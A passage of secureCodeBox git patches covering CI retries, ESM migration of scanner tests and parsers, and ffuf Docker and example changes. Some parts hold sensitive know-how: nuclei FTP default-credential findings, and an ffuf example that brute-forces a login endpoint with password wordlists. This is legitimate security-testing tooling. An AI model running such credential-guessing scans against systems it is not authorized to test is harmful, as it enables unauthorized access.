credentials","author":"pussycat0x"},"type":"network","host":"www.example.com","matched":"www.example.com:21","meta":{"password":"default","username":"anonymous"},"ip":"127.0.0.1","timestamp":"2021-08-20T22:00:48.088618+02:00"} -{"templateID":"ftp-default-credentials","info":{"tags":"network,ftp,default-login","name":"FTP Service with default credentials","author":"pussycat0x","severity":"critical"},"type":"network","host":"www.example.com","matched":"www.example.com:21","meta":{"password":"stingray","username":"anonymous"},"ip":"127.0.0.1","timestamp":"2021-08-20T22:00:48.161349+02:00"} diff --git a/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl.license b/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/nuclei/parser/parser.test.js b/scanners/nuclei/parser/parser.test.js index 0577551233..05d3fd0b5e 100644 --- a/scanners/nuclei/parser/parser.test.js +++ b/scanners/nuclei/parser/parser.test.js @@ -33,19 +33,6 @@ test("parses the example.com result correctly", async () => { expect(findings).toMatchSnapshot(); }); -test.skip("parses ftp result correctly", async () => { - const fileContent = await readFile( - import.meta.dirname + "/__testFiles__/ftp-test.jsonl", - { - encoding: "utf8", - }, - ); - - const findings = await parse(fileContent); - await expect(validateParser(findings)).resolves.toBeUndefined(); - expect(findings).toMatchSnapshot(); -}); - test("parses secureCodeBox.io result correctly", async () => { const fileContent = await readFile( import.meta.dirname + "/__testFiles__/secureCodeBox-test.jsonl", From 13563a49b7266185dfb68239c727db8ef30e13f0 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 16:53:07 +0200 Subject: [PATCH 022/137] Move retries to github action layer Retries don't seem to work properly in bun yet :/ https://github.com/oven-sh/bun/issues/16051 Might also make it slightly more readable in the output Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 7 +++++-- scanners/amass/integration-tests/amass.test.js | 1 - scanners/nmap/integration-tests/nmap.test.js | 2 -- scanners/nuclei/integration-tests/nuclei.test.js | 1 - .../integration-tests/zap-automation-framework.test.js | 4 ---- 5 files changed, 5 insertions(+), 10 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index b8655264ed..3198813da2 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -559,12 +559,15 @@ jobs: run: make deploy-test-deps - name: Start Integration Tests - working-directory: ./scanners/${{ matrix.unit }}/ + uses: nick-fields/retry@ce71cc2ab81d554ebbe88c79ab5975992d79ba08 # v3.0.2 + with: + timeout_minutes: 15 + max_attempts: 3 + command: cd ./scanners/${{ matrix.unit }}/ && bun test integration-tests/ env: # Workaround for https://github.com/oven-sh/bun/issues/7332 # not great, but this is a local connection to the kind cluster NODE_TLS_REJECT_UNAUTHORIZED: 0 - run: bun test integration-tests/ # ---- Debuging Cluster on Failure ---- diff --git a/scanners/amass/integration-tests/amass.test.js b/scanners/amass/integration-tests/amass.test.js index 6dc66e6108..4daff8b722 100644 --- a/scanners/amass/integration-tests/amass.test.js +++ b/scanners/amass/integration-tests/amass.test.js @@ -17,6 +17,5 @@ test( }, { timeout: 10 * 60 * 1000, - retry: 5, }, ); diff --git a/scanners/nmap/integration-tests/nmap.test.js b/scanners/nmap/integration-tests/nmap.test.js index 1ec125cc19..b49f7c6f1c 100644 --- a/scanners/nmap/integration-tests/nmap.test.js +++ b/scanners/nmap/integration-tests/nmap.test.js @@ -28,7 +28,6 @@ test( }, { timeout: 3 * 60 * 1000, - retry: 3, }, ); @@ -43,6 +42,5 @@ test( }, { timeout: 3 * 60 * 1000, - retry: 3, }, ); diff --git a/scanners/nuclei/integration-tests/nuclei.test.js b/scanners/nuclei/integration-tests/nuclei.test.js index 695972ba4b..79cfe2cbc7 100644 --- a/scanners/nuclei/integration-tests/nuclei.test.js +++ b/scanners/nuclei/integration-tests/nuclei.test.js @@ -29,6 +29,5 @@ test( }, { timeout: 3 * 60 * 1000, - retry: 3, }, ); diff --git a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js index 376a7259b2..e60cd67cee 100644 --- a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js +++ b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js @@ -33,7 +33,6 @@ test.concurrent( }, { timeout: 60 * 8 * 1000, - retry: 3, }, ); @@ -66,7 +65,6 @@ test.concurrent( }, { timeout: 60 * 8 * 1000, - retry: 3, }, ); @@ -99,7 +97,6 @@ test.concurrent( }, { timeout: 60 * 8 * 1000, - retry: 3, }, ); @@ -132,6 +129,5 @@ test.concurrent( }, { timeout: 60 * 8 * 1000, - retry: 3, }, ); From 7b404bd4bc14117f358ef06f13c8ef1ac79311a6 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 17:04:03 +0200 Subject: [PATCH 023/137] Move ffuf example to inline config maps so that the wordlists actually show up on the website Signed-off-by: Jannik Hollenbach --- .../scan.yaml | 15 ++++++++++++++- .../wordlist.txt | 6 ------ .../wordlist.txt.license | 3 --- .../examples/wordlist-config-map-post/scan.yaml | 15 ++++++++++++++- .../wordlistPasswords.txt | 2 -- .../wordlistPasswords.txt.license | 3 --- .../wordlistUsernames.txt | 2 -- .../wordlistUsernames.txt.license | 3 --- .../ffuf/examples/wordlist-config-map/scan.yaml | 11 ++++++++++- .../examples/wordlist-config-map/wordlist.txt | 3 --- .../wordlist-config-map/wordlist.txt.license | 3 --- 11 files changed, 38 insertions(+), 28 deletions(-) delete mode 100644 scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt delete mode 100644 scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt.license delete mode 100644 scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt delete mode 100644 scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt.license delete mode 100644 scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt delete mode 100644 scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt.license delete mode 100644 scanners/ffuf/examples/wordlist-config-map/wordlist.txt delete mode 100644 scanners/ffuf/examples/wordlist-config-map/wordlist.txt.license diff --git a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/scan.yaml b/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/scan.yaml index a23b976481..2defe88372 100644 --- a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/scan.yaml +++ b/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/scan.yaml @@ -2,6 +2,20 @@ # # SPDX-License-Identifier: Apache-2.0 +apiVersion: "v1" +kind: ConfigMap +metadata: + name: "ffuf-config" +data: + wordlist.txt: | + blog + 404 + exampleHopefullyNotFound + img/Logo_Black.svg + docs + architecture + +--- apiVersion: "execution.securecodebox.io/v1" kind: Scan metadata: @@ -24,4 +38,3 @@ spec: volumeMounts: - name: "ffuf-config" mountPath: "/config/" - diff --git a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt b/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt deleted file mode 100644 index 59a1b6318b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt +++ /dev/null @@ -1,6 +0,0 @@ -blog -404 -exampleHopefullyNotFound -img/Logo_Black.svg -docs -architecture diff --git a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt.license b/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/ffuf/examples/wordlist-config-map-post/scan.yaml b/scanners/ffuf/examples/wordlist-config-map-post/scan.yaml index 277f2f0c45..fd973e2cf2 100644 --- a/scanners/ffuf/examples/wordlist-config-map-post/scan.yaml +++ b/scanners/ffuf/examples/wordlist-config-map-post/scan.yaml @@ -1,7 +1,20 @@ # SPDX-FileCopyrightText: the secureCodeBox authors # # SPDX-License-Identifier: Apache-2.0 +apiVersion: "v1" +kind: ConfigMap +metadata: + name: "ffuf-config" +data: + wordlistPasswords.txt: | + password + 123456 + + wordlistUsernames.txt: | + user@example.com + user2@example.com +--- apiVersion: "execution.securecodebox.io/v1" kind: Scan metadata: @@ -22,7 +35,7 @@ spec: - "-H" - "Content-Type: application/json" - "-d" - - "{\"email\":\"USERNAME\",\"password\":\"PASSWORD\"}" + - '{"email":"USERNAME","password":"PASSWORD"}' - "-fc" - 500,401,403 volumes: diff --git a/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt b/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt deleted file mode 100644 index 647edb7b71..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt +++ /dev/null @@ -1,2 +0,0 @@ -password -123456 diff --git a/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt.license b/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt b/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt deleted file mode 100644 index f8e7af8023..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt +++ /dev/null @@ -1,2 +0,0 @@ -user@example.com -user2@example.com diff --git a/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt.license b/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/ffuf/examples/wordlist-config-map/scan.yaml b/scanners/ffuf/examples/wordlist-config-map/scan.yaml index 144b3f3ab0..abfe943a43 100644 --- a/scanners/ffuf/examples/wordlist-config-map/scan.yaml +++ b/scanners/ffuf/examples/wordlist-config-map/scan.yaml @@ -2,6 +2,16 @@ # # SPDX-License-Identifier: Apache-2.0 +apiVersion: "v1" +kind: ConfigMap +metadata: + name: "ffuf-config" +data: + wordlist.txt: | + blog + 404 + exampleHopefullyNotFound +--- apiVersion: "execution.securecodebox.io/v1" kind: Scan metadata: @@ -22,4 +32,3 @@ spec: volumeMounts: - name: "ffuf-config" mountPath: "/config/" - diff --git a/scanners/ffuf/examples/wordlist-config-map/wordlist.txt b/scanners/ffuf/examples/wordlist-config-map/wordlist.txt deleted file mode 100644 index bc7991405e..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map/wordlist.txt +++ /dev/null @@ -1,3 +0,0 @@ -blog -404 -exampleHopefullyNotFound diff --git a/scanners/ffuf/examples/wordlist-config-map/wordlist.txt.license b/scanners/ffuf/examples/wordlist-config-map/wordlist.txt.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map/wordlist.txt.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file From 7595fd1f0149af5f841cf423e4352811f7b542fd Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 17:04:17 +0200 Subject: [PATCH 024/137] Delete unused jest config Signed-off-by: Jannik Hollenbach --- scanners/ffuf/integration-tests/jest.config.json | 1 - scanners/ffuf/integration-tests/jest.config.json.license | 3 --- 2 files changed, 4 deletions(-) delete mode 100644 scanners/ffuf/integration-tests/jest.config.json delete mode 100644 scanners/ffuf/integration-tests/jest.config.json.license diff --git a/scanners/ffuf/integration-tests/jest.config.json b/scanners/ffuf/integration-tests/jest.config.json deleted file mode 100644 index 0967ef424b..0000000000 --- a/scanners/ffuf/integration-tests/jest.config.json +++ /dev/null @@ -1 +0,0 @@ -{} diff --git a/scanners/ffuf/integration-tests/jest.config.json.license b/scanners/ffuf/integration-tests/jest.config.json.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/integration-tests/jest.config.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file From bb5e1d579874dd42779608fb689c607ad449168c Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 17:04:34 +0200 Subject: [PATCH 025/137] Update golang version used for ffuf to 1.24 Signed-off-by: Jannik Hollenbach --- scanners/ffuf/scanner/Dockerfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scanners/ffuf/scanner/Dockerfile b/scanners/ffuf/scanner/Dockerfile index afca9102b5..6dd76ea569 100644 --- a/scanners/ffuf/scanner/Dockerfile +++ b/scanners/ffuf/scanner/Dockerfile @@ -4,7 +4,7 @@ # Write your dockerfile for the scanner ffuf here # Alternatively, you can use an existing image from docker-hub -FROM golang:1.19-alpine +FROM golang:1.24-alpine ARG scannerVersion RUN go install github.com/ffuf/ffuf/v2@$scannerVersion RUN addgroup --system --gid 1001 ffuf && adduser ffuf --system --uid 1001 --ingroup ffuf From b9c8643318b42ab9f8305ee2945815006c2dc990 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 17:05:01 +0200 Subject: [PATCH 026/137] Update ffuf to esm Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 2 +- scanners/ffuf/integration-tests/ffuf.test.js | 8 ++++---- scanners/ffuf/parser/parser.js | 4 +--- scanners/ffuf/parser/parser.test.js | 8 +++----- 4 files changed, 9 insertions(+), 13 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 3198813da2..4a20112843 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -420,7 +420,7 @@ jobs: unit: - amass - cmseek - # - ffuf + - ffuf # - git-repo-scanner # - gitleaks # - kube-hunter diff --git a/scanners/ffuf/integration-tests/ffuf.test.js b/scanners/ffuf/integration-tests/ffuf.test.js index d3dece4cbd..2d6a3ff6ab 100644 --- a/scanners/ffuf/integration-tests/ffuf.test.js +++ b/scanners/ffuf/integration-tests/ffuf.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "FFuf scan with config YAML against 'juiceshop'", @@ -45,5 +43,7 @@ test( informational: 2, }); }, - 60 * 3 * 1000, + { + timeout: 60 * 3 * 1000, + }, ); diff --git a/scanners/ffuf/parser/parser.js b/scanners/ffuf/parser/parser.js index a04b1bc6e3..19d96f7b6a 100644 --- a/scanners/ffuf/parser/parser.js +++ b/scanners/ffuf/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { +export async function parse(fileContent) { if (!fileContent || !fileContent.results || fileContent.results.length == 0) { return []; } @@ -37,5 +37,3 @@ async function parse(fileContent) { }; }); } - -module.exports.parse = parse; diff --git a/scanners/ffuf/parser/parser.test.js b/scanners/ffuf/parser/parser.test.js index ace135133b..2e764c10fa 100644 --- a/scanners/ffuf/parser/parser.test.js +++ b/scanners/ffuf/parser/parser.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse ffuf json file", async () => { const fileContent = JSON.parse( From b0c5d6238bf832fcf827b1172e4228532b79ab3a Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 17:48:08 +0200 Subject: [PATCH 027/137] Optimize ffuf image for arm better security and arm compat Signed-off-by: Jannik Hollenbach --- scanners/ffuf/Chart.yaml | 2 +- scanners/ffuf/scanner/Dockerfile | 17 ++++++++--------- 2 files changed, 9 insertions(+), 10 deletions(-) diff --git a/scanners/ffuf/Chart.yaml b/scanners/ffuf/Chart.yaml index 1dda891e69..3502dbeee7 100644 --- a/scanners/ffuf/Chart.yaml +++ b/scanners/ffuf/Chart.yaml @@ -13,7 +13,7 @@ kubeVersion: ">=v1.11.0-0" annotations: versionApi: https://api.github.com/repos/ffuf/ffuf/releases/latest # supported cpu architectures for which docker images for the scanner should be build - supported-platforms: linux/amd64 + supported-platforms: linux/amd64,linux/arm64 keywords: - security - ffuf diff --git a/scanners/ffuf/scanner/Dockerfile b/scanners/ffuf/scanner/Dockerfile index 6dd76ea569..d121f101d9 100644 --- a/scanners/ffuf/scanner/Dockerfile +++ b/scanners/ffuf/scanner/Dockerfile @@ -2,14 +2,13 @@ # # SPDX-License-Identifier: Apache-2.0 -# Write your dockerfile for the scanner ffuf here -# Alternatively, you can use an existing image from docker-hub -FROM golang:1.24-alpine +FROM --platform=$BUILDPLATFORM golang:1.24-alpine AS builder ARG scannerVersion -RUN go install github.com/ffuf/ffuf/v2@$scannerVersion -RUN addgroup --system --gid 1001 ffuf && adduser ffuf --system --uid 1001 --ingroup ffuf -RUN mkdir -p /home/ffuf/.config/ffuf && chown -R ffuf:ffuf /home/ffuf/.config/ffuf -RUN mkdir -p /home/ffuf/.config/ffuf/scraper && chown -R ffuf:ffuf /home/ffuf/.config/ffuf/scraper -USER 1001 +RUN GOOS=$TARGETOS GOARCH=$TARGETARCH CGO_ENABLED=0 go install github.com/ffuf/ffuf/v2@$scannerVersion -CMD ["ffuf"] +FROM gcr.io/distroless/static-debian12:nonroot +COPY --from=builder --chown=root:root --chmod=755 /go/bin/ffuf /usr/local/bin/ffuf + +WORKDIR /home/nonroot + +ENTRYPOINT ["/usr/local/bin/ffuf"] From 0827add51da08e53c6eeba34047456e23e3a00ba Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 17:52:06 +0200 Subject: [PATCH 028/137] Adapt sqlite import to be esm/commonjs compatible Signed-off-by: Jannik Hollenbach --- scanners/amass/parser/parser.js | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/scanners/amass/parser/parser.js b/scanners/amass/parser/parser.js index d2892c47f9..25c055207c 100644 --- a/scanners/amass/parser/parser.js +++ b/scanners/amass/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Database, OPEN_READONLY } from "sqlite3"; +import * as sqlite from "sqlite3"; import { writeFile } from "node:fs/promises"; import { join } from "node:path"; import { tmpdir } from "node:os"; @@ -31,12 +31,16 @@ async function openDatabase(fileContent) { await writeFile(tempFilePath, fileContent); return await new Promise((resolve, reject) => { - const db = new Database(tempFilePath, OPEN_READONLY, (err) => { - if (err) { - reject(err.message); - return; - } - }); + const db = new sqlite.Database( + tempFilePath, + sqlite.OPEN_READONLY, + (err) => { + if (err) { + reject(err.message); + return; + } + }, + ); resolve(db); }); } From 6cb1a86c7b6aec0e9a37778cffa2f7fc1b5b4b51 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 17:58:26 +0200 Subject: [PATCH 029/137] Remove `.concurrent` which doesn't exist in bun yet Signed-off-by: Jannik Hollenbach --- .../integration-tests/zap-automation-framework.test.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js index e60cd67cee..f0d5ff4fd1 100644 --- a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js +++ b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js @@ -4,7 +4,7 @@ import { scan } from "../../../tests/integration/helpers.js"; -test.concurrent( +test( "zap automation scan without config against 'bodgeit' should only find couple findings", async () => { const { count } = await scan( @@ -36,7 +36,7 @@ test.concurrent( }, ); -test.concurrent( +test( "zap automation scan without config against 'swagger-petstore' should only find couple findings", async () => { const { count } = await scan( @@ -68,7 +68,7 @@ test.concurrent( }, ); -test.concurrent( +test( "zap automation scan against a plain nginx container should only find a couple of findings", async () => { const { count } = await scan( @@ -100,7 +100,7 @@ test.concurrent( }, ); -test.concurrent( +test( "authenticated zap automation scan with little spider time against a juice shop container should find some findings", async () => { const { count } = await scan( From 92a415c826b4b84fefe913d92ae535029f0a6db5 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 17:59:03 +0200 Subject: [PATCH 030/137] Delete retry option which doesn't work in bun Signed-off-by: Jannik Hollenbach --- scanners/cmseek/integration-tests/cmseek.test.js | 3 --- 1 file changed, 3 deletions(-) diff --git a/scanners/cmseek/integration-tests/cmseek.test.js b/scanners/cmseek/integration-tests/cmseek.test.js index f3bf6dd7be..d94f23161e 100644 --- a/scanners/cmseek/integration-tests/cmseek.test.js +++ b/scanners/cmseek/integration-tests/cmseek.test.js @@ -30,7 +30,6 @@ test( }, { timeout: 3 * 60 * 1000, - retries: 3, }, ); @@ -58,7 +57,6 @@ test( }, { timeout: 3 * 60 * 1000, - retries: 3, }, ); @@ -71,6 +69,5 @@ test( }, { timeout: 3 * 60 * 1000, - retries: 3, }, ); From cb49adc695328aa9ac54bf4bb9a92bc77d2c5de6 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 22 Jun 2025 18:12:10 +0200 Subject: [PATCH 031/137] Migrate git-repo-scanner to esm Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 2 +- scanners/git-repo-scanner/Chart.yaml | 2 +- .../integration-tests/git-repo-scanner.test.js | 8 ++++---- scanners/git-repo-scanner/parser/parser.js | 4 +--- scanners/git-repo-scanner/parser/parser.test.js | 8 +++----- 5 files changed, 10 insertions(+), 14 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 4a20112843..e6ba36a043 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -421,7 +421,7 @@ jobs: - amass - cmseek - ffuf - # - git-repo-scanner + - git-repo-scanner # - gitleaks # - kube-hunter # - ncrack diff --git a/scanners/git-repo-scanner/Chart.yaml b/scanners/git-repo-scanner/Chart.yaml index 1443a59345..39f5f8b68d 100644 --- a/scanners/git-repo-scanner/Chart.yaml +++ b/scanners/git-repo-scanner/Chart.yaml @@ -13,7 +13,7 @@ appVersion: "1.1" kubeVersion: ">=v1.11.0-0" annotations: # supported cpu architectures for which docker images for the scanner should be build - supported-platforms: linux/amd64 + supported-platforms: linux/amd64,linux/arm64 keywords: - git diff --git a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js index 7b1763e54e..e7c6a18791 100644 --- a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js +++ b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "gitleaks should find at least 1 repository in the GitHub secureCodeBox organisation", @@ -20,5 +18,7 @@ test( // There must be >= 28 Repositories found in the GitHub secureCodeBox organisation. expect(count).toBeGreaterThanOrEqual(28); }, - 3 * 60 * 1000, + { + timeout: 3 * 60 * 1000, + }, ); diff --git a/scanners/git-repo-scanner/parser/parser.js b/scanners/git-repo-scanner/parser/parser.js index 910b1b9d55..790b4dc96f 100644 --- a/scanners/git-repo-scanner/parser/parser.js +++ b/scanners/git-repo-scanner/parser/parser.js @@ -2,8 +2,6 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { +export async function parse(fileContent) { return fileContent; } - -module.exports.parse = parse; diff --git a/scanners/git-repo-scanner/parser/parser.test.js b/scanners/git-repo-scanner/parser/parser.test.js index 760dfb1475..a851d1e300 100644 --- a/scanners/git-repo-scanner/parser/parser.test.js +++ b/scanners/git-repo-scanner/parser/parser.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse empty json file", async () => { const fileContent = await readFile( From f388771d7bf40b0be4749c5d2b1ecb7aa30fed85 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 23 Jun 2025 23:08:54 +0200 Subject: [PATCH 032/137] Makefile cleanup Signed-off-by: Jannik Hollenbach --- scanners/ffuf/Makefile | 6 +----- scanners/git-repo-scanner/Makefile | 8 -------- scanners/semgrep/Makefile | 10 ++-------- scanners/test-scan/Makefile | 15 --------------- scanners/zap-automation-framework/Makefile | 10 ---------- 5 files changed, 3 insertions(+), 46 deletions(-) diff --git a/scanners/ffuf/Makefile b/scanners/ffuf/Makefile index 25f0bf8946..c8eb5edee9 100644 --- a/scanners/ffuf/Makefile +++ b/scanners/ffuf/Makefile @@ -12,9 +12,5 @@ custom_scanner = set include ../../scanners.mk deploy-test-deps: deploy-test-dep-juiceshop - -integration-tests: - @echo ".: đŸŠē Starting integration test in kind namespace 'integration-tests'." - kubectl -n integration-tests delete scans --all kubectl apply -f ./integration-tests/configmap-wordlist.yaml -n integration-tests - cd $(SCANNERS_DIR) && npm ci && cd $(scanner)/integration-tests && npm run test:integration -- $(scanner)/integration-tests + diff --git a/scanners/git-repo-scanner/Makefile b/scanners/git-repo-scanner/Makefile index 35dd0be3d4..e67f54c8ff 100644 --- a/scanners/git-repo-scanner/Makefile +++ b/scanners/git-repo-scanner/Makefile @@ -15,11 +15,3 @@ include ../../scanners.mk unit-tests: @$(MAKE) -s unit-test-py -.PHONY: integration-tests -integration-tests: - @echo ".: đŸŠē Starting integration test in kind namespace 'integration-tests'." - @echo "Disabled due to performance." - #kubectl -n integration-tests delete scans --all - #cd ../../tests/integration/ && npm ci - #cd ../../scanners/${scanner} - #npm run test:integration -- ${scanner}/integration-tests diff --git a/scanners/semgrep/Makefile b/scanners/semgrep/Makefile index 3ddf7a279c..93bd2b612a 100644 --- a/scanners/semgrep/Makefile +++ b/scanners/semgrep/Makefile @@ -9,12 +9,6 @@ scanner = semgrep include ../../scanners.mk # Ensures that all the default makefile targets are included -.PHONY: integration-tests -integration-tests: - @echo ".: đŸŠē Starting integration test in kind namespace 'integration-tests'." - kubectl -n integration-tests delete scans --all - cd $(PROJECT_DIR)/tests/integration/ && npm ci - cd $(SCANNERS_DIR)/${scanner} +deploy-test-deps: + @echo ".: đŸŠē Deploying test dependencies for Semgrep in kind namespace 'integration-tests'." kubectl -n integration-tests create configmap semgrep-test-file --from-file=integration-tests/testfile.py - npm run test:integration -- ${scanner}/integration-tests - kubectl -n integration-tests delete configmap semgrep-test-file diff --git a/scanners/test-scan/Makefile b/scanners/test-scan/Makefile index 39e16f24ec..1a2e7a806c 100644 --- a/scanners/test-scan/Makefile +++ b/scanners/test-scan/Makefile @@ -10,18 +10,3 @@ scanner = test-scan custom_scanner = set include ../../scanners.mk - -deploy-with-scanner: - @echo ".: 💾 Deploying '$(name)' '$(scanner-prefix)' HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install test-scan . \ - --set="scanner.image.repository=docker.io/$(IMG_NS)/$(scanner-prefix)-$(name)" \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(name)" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="scanner.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" - -integration-tests: - @echo ".: đŸŠē Starting integration test in kind namespace 'integration-tests'." - kubectl -n integration-tests delete scans --all - cd $(PROJECT_DIR)/tests/integration/ && npm ci && npm run test:integration -- generic/findings-validation.test.js diff --git a/scanners/zap-automation-framework/Makefile b/scanners/zap-automation-framework/Makefile index d28e80fd1d..60e2154d1e 100644 --- a/scanners/zap-automation-framework/Makefile +++ b/scanners/zap-automation-framework/Makefile @@ -11,14 +11,4 @@ scanner = zap-automation-framework include ../../scanners.mk deploy-test-deps: deploy-test-dep-juiceshop deploy-test-dep-nginx deploy-test-dep-bodgeit deploy-test-dep-petstore - -#Run integration tests for the ZAP Automation Framework Scanner. -integration-tests: - @echo ".: đŸŠē Starting integration test in kind namespace 'integration-tests'." - kubectl -n integration-tests delete scans --all - kubectl -n integration-tests delete configmaps --all - helm -n integration-tests upgrade --install $(scanner) ./ --wait \ - 